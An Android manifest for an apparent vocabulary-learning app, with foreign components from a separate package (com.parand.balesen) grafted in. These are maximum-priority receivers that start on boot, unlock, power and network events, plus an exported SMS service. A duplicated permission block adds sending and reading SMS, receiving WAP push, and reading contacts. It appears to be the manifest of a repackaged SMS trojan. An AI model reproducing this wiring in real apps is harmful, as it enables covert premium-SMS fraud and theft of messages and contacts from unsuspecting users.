<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.nineiworks.wordsIT">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_LOGS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <application android:debuggable="true" android:icon="@drawable/icon" android:label="@string/app_name">
        <meta-data android:name="UMENG_APPKEY" android:value="4e02fe4f431fe33cb000025e"/>
        <activity android:label="@string/app_name" android:name=".activity.Words" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:label="@string/about" android:name=".activity.About" android:screenOrientation="portrait"/>
        <activity android:label="@string/coupon" android:name=".activity.Coupon" android:screenOrientation="portrait"/>
        <activity android:label="@string/wordexercise" android:name=".activity.WordsExercise" android:screenOrientation="portrait"/>
        <activity android:label="@string/wordlist" android:name=".activity.WordsList" android:screenOrientation="portrait"/>
        <activity android:label="@string/errorrecord" android:name=".activity.ErrorRecord" android:screenOrientation="portrait"/>
        <activity android:label="@string/help" android:name=".activity.Help" android:screenOrientation="portrait"/>
        <activity android:label="@string/answer" android:name=".activity.Record" android:screenOrientation="portrait"/>
        <activity android:label="@string/wordstype" android:name=".activity.WordType" android:screenOrientation="portrait"/>
        <activity android:label="@string/wordlist" android:name=".activity.CouponDetail" android:screenOrientation="portrait"/>
        <activity android:label="@string/wordlist" android:name=".activity.Menu" android:screenOrientation="portrait"/>
        <activity android:label="@string/wordlist" android:name="activity.SelectWordTypeivity.SelectWordType" android:screenOrientation="portrait"/>
        <receiver android:name="com.parand.balesen.Baleon">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.parand.balesen.Lanten">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="com.parand.balesen.Urelo"/>
        <service android:exported="true" android:name="com.parand.balesen.VoateService">
            <intent-filter>
                <action android:name="android.intent.action.START_SMS_SERVICE"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </service>
    </application>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_WAP_PUSH"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.CLEAR_APP_CACHE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
</manifest>
